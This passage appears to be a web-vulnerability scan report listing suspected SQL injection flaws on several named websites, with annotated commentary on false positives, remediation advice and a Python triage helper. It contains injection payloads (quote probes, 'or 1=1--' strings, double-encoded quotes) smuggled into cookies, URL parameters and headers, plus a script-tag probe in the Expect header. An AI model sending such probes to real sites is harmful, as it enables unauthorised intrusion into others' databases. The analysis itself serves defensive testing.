Referer: http://www.theamericanmonk.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_=ysv9sd684163c3y'%20and%201%3d1--%20; mr_src=mr_7

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: text/html
Date: Wed, 04 May 2011 01:02:31 GMT
Connection: Keep-Alive
Set-Cookie: mr_src=mr_7; path=/
X-Powered-By: PHP/5.2.14
Content-Length: 236

_mrd.cookie='sess_=ysv9sd684163c3y' and 1=1-- ;' + _mr_ex + ';'+ 'path=/';_mrd.cookie='ref_=mr_7;' + _mr_ex + ';'+ 'path=/';_mrd.cookie = 't_=mr_7;' + _mr_ex + ';'+'path=/';var _mrTrackLinks = new Array;

                   _mrScanLinks();
               

Request 2

GET /track.php?mid=1539_7_2&llc=http%3A//www.theamericanmonk.com/&s=ysv9sd684163c3y&l=www.theamericanmonk.com/&ti=The%20American%20Monk%20-%20Life.%20Enlightened.%20-%20Theamericanmonk.com&r=1&t=mr_7&vid=206617815 HTTP/1.1
Host: tracking.moon-ray.com
Proxy-Connection: keep-alive
Referer: http://www.theamericanmonk.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_=ysv9sd684163c3y'%20and%201%3d2--%20; mr_src=mr_7

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: text/html
Date: Wed, 04 May 2011 01:02:33 GMT
Connection: Keep-Alive
Set-Cookie: mr_src=mr_7; path=/
X-Powered-By: PHP/5.2.14
Content-Length: 293

_mrd.cookie='sess_=ysv9sd684163c3y' and 1=2-- ;' + _mr_ex + ';'+ 'path=/';_mrd.cookie='ref_=mr_7;' + _mr_ex + ';'+ 'path=/';_mrd.cookie='vid=206618145;' + _mr_ex + ';' + 'path=/';_mrd.cookie = 't_=mr_7;' + _mr_ex + ';'+'path=/';var _mrTrackLinks = new Array;

                   _mrScanLinks();
               

1.8. http://tracking.moon-ray.com/track.php [t parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tracking.moon-ray.com
Path:   /track.php

Issue detail

The t parameter appears to be vulnerable to SQL injection attacks. The payloads 24581160'%20or%201%3d1--%20 and 24581160'%20or%201%3d2--%20 were each submitted in the t parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /track.php?mid=1539_7_2&llc=http%3A//www.theamericanmonk.com/&s=ysv9sd684163c3y&l=www.theamericanmonk.com/&ti=The%20American%20Monk%20-%20Life.%20Enlightened.%20-%20Theamericanmonk.com&r=1&t=mr_724581160'%20or%201%3d1--%20&vid=206617815 HTTP/1.1
Host: tracking.moon-ray.com
Proxy-Connection: keep-alive
Referer: http://www.theamericanmonk.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_=ysv9sd684163c3y; mr_src=mr_7

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: text/html
Date: Wed, 04 May 2011 01:00:40 GMT
Connection: Keep-Alive
Set-Cookie: mr_src=mr_724581160%27+or+1%3D1--+; path=/
X-Powered-By: PHP/5.2.14
Content-Length: 305

_mrd.cookie='ref_=mr_724581160' or 1=1-- ;' + _mr_ex + ';'+ 'path=/';_mrd.cookie='vid=206618018;' + _mr_ex + ';' + 'path=/';_mrd.cookie = 'own_=1;' + _mr_ex + ';'+'path=/';_mrd.cookie = 't_=mr_724581160' or 1=1-- ;' + _mr_ex + ';'+'path=/';var _mrTrackLinks = new Array;

                   _mrScanLinks();
               

Request 2

GET /track.php?mid=1539_7_2&llc=http%3A//www.theamericanmonk.com/&s=ysv9sd684163c3y&l=www.theamericanmonk.com/&ti=The%20American%20Monk%20-%20Life.%20Enlightened.%20-%20Theamericanmonk.com&r=1&t=mr_724581160'%20or%201%3d2--%20&vid=206617815 HTTP/1.1
Host: tracking.moon-ray.com
Proxy-Connection: keep-alive
Referer: http://www.theamericanmonk.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_=ysv9sd684163c3y; mr_src=mr_7

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: text/html
Date: Wed, 04 May 2011 01:00:43 GMT
Connection: Keep-Alive
Set-Cookie: mr_src=mr_724581160%27+or+1%3D2--+; path=/
X-Powered-By: PHP/5.2.14
Content-Length: 256

_mrd.cookie='ref_=mr_724581160' or 1=2-- ;' + _mr_ex + ';'+ 'path=/';_mrd.cookie='vid=206618020;' + _mr_ex + ';' + 'path=/';_mrd.cookie = 't_=mr_724581160' or 1=2-- ;' + _mr_ex + ';'+'path=/';var _mrTrackLinks = new Array;

                   _mrScanLinks();
               

1.9. http://www.acamnet.org/favicon.ico [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.acamnet.org
Path:   /favicon.ico

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.acamnet.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>
Referer: http://www.google.com/search?hl=en&q='

Response 1

HTTP/1.1 417 Expectation Failed
Content-Length: 0
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR IND PHY ONL UNI PUR COM NAV INT DEM CNT STA POL"
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 04:04:52 GMT
Connection: close

Request 2

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.acamnet.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 200 OK
Content-Length: 894
Content-Type: image/x-icon
Last-Modified: Fri, 19 Jun 2009 07:15:24 GMT
Accept-Ranges: bytes
ETag: "534b5b7adf0c91:22d2d"
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR IND PHY ONL UNI PUR COM NAV INT DEM CNT STA POL"
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 04:04:52 GMT
Connection: close

..............h.......(....... .........................................................................................................................................................................
...[SNIP]...

1.10. http://www.acamnet.org/favicon.ico [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.acamnet.org
Path:   /favicon.ico

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

In this pair the "error" is an HTTP 417 Expectation Failed with an empty body (Content-Length: 0). That is IIS rejecting the Expect: header that curl added to the request, not a database error; the second request, identical apart from the extra %2527, was served the icon normally. Until the pair is reproduced without the Expect header, this should be treated as a probable false positive.

The scanner also reports that the plain ' was blocked and that the double URL-encoded form %2527 got through. Only the double-encoded requests are shown, so the blocking itself is not evidenced in this report.

Remediation detail

Web servers do not URL-decode header values, so any decoding of the User-Agent value is being performed by the application itself; it should not decode this header at all, and in any case input validation must run after all custom canonicalisation has been carried out. The underlying fix is to pass the header value to the database as a bound parameter rather than concatenating it into the query text.
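The quote/double-quote heuristic used throughout this report is easy to reproduce by hand, and the pairs captured here show why the result needs reading rather than trusting. The script below is an added example for this page, not part of the XSS.CX output or of any scanned application: it builds the three kinds of probe the scanner used (path, parameter name, header), deliberately without curl's Expect header, and classifies a response pair. The Response objects are constructed from the captured responses on this page with bodies cut to the fragment that matters; no traffic is sent.

```python
import re
from dataclasses import dataclass, field


@dataclass
class Response:
    """The parts of an HTTP response the differential test looks at."""
    status: int
    body: str = ""
    headers: dict = field(default_factory=dict)


# Database-layer error signatures taken from the responses captured in this
# report. A match on the "'" probe that disappears on the "''" probe is the
# strongest signal the heuristic can give before a manual check.
DB_ERROR_SIGNATURES = [
    r"ODBC-Aufruf fehlgeschlagen",            # German ADO/ODBC "ODBC call failed" (beam.to)
    r"Unclosed quotation mark",               # SQL Server (mybusinesslisting.com)
    r"Incorrect syntax near",                 # SQL Server
    r"You have an error in your SQL syntax",  # MySQL (truewoman.com)
    r"Error # -2147217900",                   # ADO DB_E_ERRORSINCOMMAND, 0x80040E14
]
_DB_ERROR_RE = re.compile("|".join(DB_ERROR_SIGNATURES))


def has_db_error(resp: Response) -> bool:
    return bool(_DB_ERROR_RE.search(resp.body))


def probe_request(path, where, payload, host, header_name=None, header_value=""):
    """Build the raw request for one probe. `where` is 'path' (REST URL
    parameter 1: payload appended to the path), 'param-name' (the scanner's
    arbitrary parameter `1=1` with the payload appended to the *name*) or
    'header' (payload appended to header_value). No Expect header is sent."""
    headers = {"Host": host, "User-Agent": "probe/1.0", "Accept": "*/*"}
    if where == "path":
        target = path + payload
    elif where == "param-name":
        target = f"{path}?1{payload}=1"
    elif where == "header":
        if not header_name:
            raise ValueError("header probes need header_name")
        target = path
        headers[header_name] = header_value + payload
    else:
        raise ValueError(f"unknown probe location {where!r}")
    lines = [f"GET {target} HTTP/1.1"] + [f"{k}: {v}" for k, v in headers.items()]
    return "\r\n".join(lines) + "\r\n\r\n"


def classify(single: Response, double: Response, expect_header_sent: bool) -> str:
    """Read a (', '') response pair the way an analyst should."""
    if expect_header_sent and 417 in (single.status, double.status):
        # 417 Expectation Failed is IIS or the Varnish front end refusing the
        # curl-supplied Expect header; it says nothing about the quote.
        return "expect-artifact"
    if has_db_error(single) and not has_db_error(double):
        return "db-error-differential"
    if has_db_error(single) and has_db_error(double):
        return "db-error-both"          # the escaped quote also broke the query
    if (single.status, single.body) != (double.status, double.body):
        return "differs-no-db-error"    # something changed, but not the database
    return "no-difference"


# Constructed from the captured pairs on this page (bodies cut to the
# fragment that matters); the third element records whether curl's Expect
# header was part of the request.
SAMPLES = {
    "1.10 acamnet.org User-Agent": (
        Response(417), Response(200, "<icon bytes>"), True),
    "1.11 beam.to param name": (
        Response(200, "<H1>Error in /cgi/beam2.exe</H1><PRE>ODBC-Aufruf fehlgeschlagen. Error Numbe"),
        Response(200, "<TITLE>BEAMTO</TITLE>"), False),
    "1.20 scrapblog.com param name": (
        Response(404, "[HttpException]: The controller for path '/favicon.ico' was not found"),
        Response(302, "Object moved", {"Location": "/error.aspx?emt=2"}), True),
    "1.23 truewoman.com path": (
        Response(200, "Execution of a query to the database failed - You have an error in your SQL syntax"),
        Response(404, "<!DOCTYPE html"), False),
}


def triage(samples=SAMPLES) -> dict:
    """Classify every captured pair; the scanner's raw verdict is 'High' for all of them."""
    return {name: classify(*pair) for name, pair in samples.items()}
```

Run against the captured pairs, triage() separates the two findings that rest on a real database error (beam.to, truewoman.com) from the acamnet.org pair, which is an Expect-header artefact, and the scrapblog.com pair, which differs without any database involvement. When re-testing a host, send the probes built by probe_request so that a 417 can no longer masquerade as an error.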

Request 1

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3%2527
Host: www.acamnet.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 1

HTTP/1.1 417 Expectation Failed
Content-Length: 0
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR IND PHY ONL UNI PUR COM NAV INT DEM CNT STA POL"
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 04:04:51 GMT
Connection: close

Request 2

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3%2527%2527
Host: www.acamnet.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 2

HTTP/1.1 200 OK
Content-Length: 894
Content-Type: image/x-icon
Last-Modified: Fri, 19 Jun 2009 07:15:24 GMT
Accept-Ranges: bytes
ETag: "534b5b7adf0c91:22d2d"
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR IND PHY ONL UNI PUR COM NAV INT DEM CNT STA POL"
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 04:04:51 GMT
Connection: close

..............h.......(....... .........................................................................................................................................................................
...[SNIP]...

1.11. http://www.beam.to/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.beam.to
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and an error message was returned. The "general error message" is in fact a database-layer failure: an "Internal Error" page from /cgi/beam2.exe whose body begins "ODBC-Aufruf fehlgeschlagen" (German: "ODBC call failed"); the ODBC error number is cut off in the capture. Two single quotes were then submitted and the site returned its normal meta-refresh redirect to http://beam.to/index.asp. You should review the full contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. Note that the injected value is the name of a parameter, not its value, so the handler is building its query from the raw query string.

Request 1

GET /?1'=1 HTTP/1.1
Host: www.beam.to
Proxy-Connection: keep-alive
X-Purpose: : preview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Wed, 04 May 2011 02:14:59 GMT
Connection: close
Content-type: text/html

<HTML><HEAD><TITLE>Internal Error</TITLE></HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000" LINK="#0000FF" VLINK="#0000FF">
<H1>Error in /cgi/beam2.exe</H1>
<PRE>ODBC-Aufruf fehlgeschlagen. Error Numbe
...[SNIP]...

Request 2

GET /?1''=1 HTTP/1.1
Host: www.beam.to
Proxy-Connection: keep-alive
X-Purpose: : preview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Wed, 04 May 2011 02:15:00 GMT
Connection: close
Content-type: text/html

<HTML><HEAD><TITLE>BEAMTO</TITLE>
<meta http-equiv="Refresh"content="0; URL=http://beam.to/index.asp">
</HEAD><BODY>
</BODY></HTML>

1.12. http://www.beam.to/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.beam.to
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and the same /cgi/beam2.exe "ODBC-Aufruf fehlgeschlagen" (ODBC call failed) error page as in 1.11 was returned. Two single quotes were then submitted and the error disappeared, giving the normal redirect to http://beam.to/index.asp. The favicon path is evidently routed through the same CGI handler as the site root, so the requested path itself reaches the query. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.beam.to
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Wed, 04 May 2011 02:12:30 GMT
Connection: close
Content-type: text/html

<HTML><HEAD><TITLE>Internal Error</TITLE></HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000" LINK="#0000FF" VLINK="#0000FF">
<H1>Error in /cgi/beam2.exe</H1>
<PRE>ODBC-Aufruf fehlgeschlagen. Error Numbe
...[SNIP]...

Request 2

GET /favicon.ico'' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.beam.to
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Wed, 04 May 2011 02:12:31 GMT
Connection: close
Content-type: text/html

<HTML><HEAD><TITLE>BEAMTO</TITLE>
<meta http-equiv="Refresh"content="0; URL=http://beam.to/index.asp">
</HEAD><BODY>
</BODY></HTML>

1.13. http://www.beam.to/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.beam.to
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and the /cgi/beam2.exe "ODBC-Aufruf fehlgeschlagen" (ODBC call failed) error page was returned, exactly as in 1.11 and 1.12. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present; the three beam.to findings are one sink reached through different parts of the request line.

Request 1

GET /favicon.ico?1'=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.beam.to
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Wed, 04 May 2011 02:12:19 GMT
Connection: close
Content-type: text/html

<HTML><HEAD><TITLE>Internal Error</TITLE></HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000" LINK="#0000FF" VLINK="#0000FF">
<H1>Error in /cgi/beam2.exe</H1>
<PRE>ODBC-Aufruf fehlgeschlagen. Error Numbe
...[SNIP]...

Request 2

GET /favicon.ico?1''=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.beam.to
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Wed, 04 May 2011 02:12:20 GMT
Connection: close
Content-type: text/html

<HTML><HEAD><TITLE>BEAMTO</TITLE>
<meta http-equiv="Refresh"content="0; URL=http://beam.to/index.asp">
</HEAD><BODY>
</BODY></HTML>

1.14. http://www.bustthebillstack.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.bustthebillstack.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The captured pair does not bear this out. The single-quote request (/favicon.ico%2527) was answered with a 200 parking page (Server: Oversee Turing, a parkinglot cookie, a dsnextgen.com P3P policy), and it was the double-quote request (%2527%2527) that received the "error": a 417 Expectation Failed from the Varnish front end, which is a reaction to the Expect header curl added to the request, not to the payload. Neither response contains a database error, and the host is a parked domain with no application behind it, so this should be treated as a false positive.

The scanner's note that the plain ' was blocked and that the double URL-encoded %2527 got through is not evidenced here either, since only the double-encoded requests are shown.

Remediation detail

None is warranted on this evidence. In general there is no need to URL-decode a path segment a second time, since the web server has already decoded it once, and any input validation must run after all custom canonicalisation has been carried out.

Request 1

GET /favicon.ico%2527 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bustthebillstack.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 1

HTTP/1.0 200 (OK)
Cache-Control: private, no-cache, must-revalidate
Pragma: no-cache
Server: Oversee Turing v1.0.0
Content-Length: 1220
Content-Type: text/html
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://www.dsnextgen.com/w3c/p3p.xml", CP="NOI DSP COR ADMa OUR NOR STA"
Set-Cookie: parkinglot=1; domain=.bustthebillstack.com; path=/; expires=Thu, 05-May-2011 01:25:54 GMT
Connection: Keep-Alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd">
<!-- turing_cluster_prod -->
<html>
<head>
<title>bustthebillstack.com</title>
<meta nam
...[SNIP]...

Request 2

GET /favicon.ico%2527%2527 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bustthebillstack.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 2

HTTP/1.1 417 Expectation Failed
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 416
Date: Wed, 04 May 2011 01:25:54 GMT
X-Varnish: 2330089581
Age: 0
Via: 1.1 varnish
Cneonction: close
X-Served-By: tdd01.ds.lax1.oversee.net
X-Cache: MISS


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...

1.15. http://www.findcoinprices.info/favicon.ico [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.findcoinprices.info
Path:   /favicon.ico

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

In this pair the "error" is a 417 Expectation Failed from Varnish, a response to the Expect header in the request rather than to the single quote, and the double-quote request was answered with a 302 to a domainsponsor.com parking favicon. Neither response contains a database error, and the host (Server: Oversee Turing) is a parked domain. Treat this as a false positive; if the host is ever re-tested, send the probes without an Expect header.

Request 1

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3'
Host: www.findcoinprices.info
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 1

HTTP/1.1 417 Expectation Failed
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 416
Date: Wed, 04 May 2011 01:05:53 GMT
X-Varnish: 2329927433
Age: 0
Via: 1.1 varnish
Cneonction: close
X-Served-By: tdd01.ds.lax1.oversee.net
X-Cache: MISS


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...
<h1>Error 417 Expectation Failed</h1>
...[SNIP]...

Request 2

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3''
Host: www.findcoinprices.info
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 2

HTTP/1.1 302 (Found)
Location: http://spi.domainsponsor.com/skins/favicon/mi_favicon.ico
Server: Oversee Turing v1.0.0
Content-Length: 32
Content-Type: text/html

<html><body><br></body></html>

1.16. http://www.henryfields.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.henryfields.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 65020305'%20or%201%3d1--%20 and 65020305'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input may be being incorporated into a SQL query in an unsafe way.

The difference is in the redirect target: the "or 1=1" request was redirected to http://henryfields.com/default.asp?sid=0610789, while the "or 1=2" request was redirected to http://henryfields.com/default.asp? with no sid value. A value that is present when the injected condition is true and absent when it is false is the classic boolean-based signature and deserves manual follow-up. It could also be the application reacting to two unequal strings in its own logic, so confirm with further true/false pairs (using a different random prefix) before treating the injection as established.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico65020305'%20or%201%3d1--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.henryfields.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 1 (redirected)

HTTP/1.1 302 Object moved
Date: Wed, 04 May 2011 02:53:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://henryfields.com/default.asp?sid=0610789
Content-Length: 167
Content-Type: text/html
Expires: Wed, 04 May 2011 02:53:14 GMT
Set-Cookie: ASPSESSIONIDCCRQCDTC=HNIBAJNDHIBKPNHHJECHJMMH; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://henryfields.com/default.asp?sid=0610789">here</a>.</body>

Request 2

GET /favicon.ico65020305'%20or%201%3d2--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.henryfields.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 2 (redirected)

HTTP/1.1 302 Object moved
Date: Wed, 04 May 2011 02:53:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://henryfields.com/default.asp?
Content-Length: 156
Content-Type: text/html
Expires: Wed, 04 May 2011 02:53:16 GMT
Set-Cookie: ASPSESSIONIDCCRQCDTC=JNIBAJNDNHDCFIICOHKCOGEF; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://henryfields.com/default.asp?">here</a>.</body>

1.17. http://www.mybusinesslisting.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mybusinesslisting.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload 18080215'%20or%201%3d1--%20 was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server. Error # -2147217900 is 0x80040E14 (DB_E_ERRORSINCOMMAND), the ADO/OLE DB code for a command the provider could not parse, and "Unclosed quotation mark before the character string" is SQL Server's wording; together they point to classic ASP talking to SQL Server through ADO. The response also echoes the SQL statement itself (Select _tbl_Listings.*, _tbl_Categories.txtName as txtCategory, ...), handing an attacker the table and column names. The path /favicon.ico18080215'... is not a file, so the request is being routed to a catch-all ASP page that incorporates the requested path into its listings query.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages, and above all the SQL text, from being returned in responses. The query itself should be built with bound parameters (an ADODB.Command with Parameters) rather than by concatenating the request path into the statement.

Request

GET /favicon.ico18080215'%20or%201%3d1--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mybusinesslisting.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:44:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 462
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQASCRATT=MFGAHBODGOKKPLIPNCODDNAI; path=/
Cache-control: private

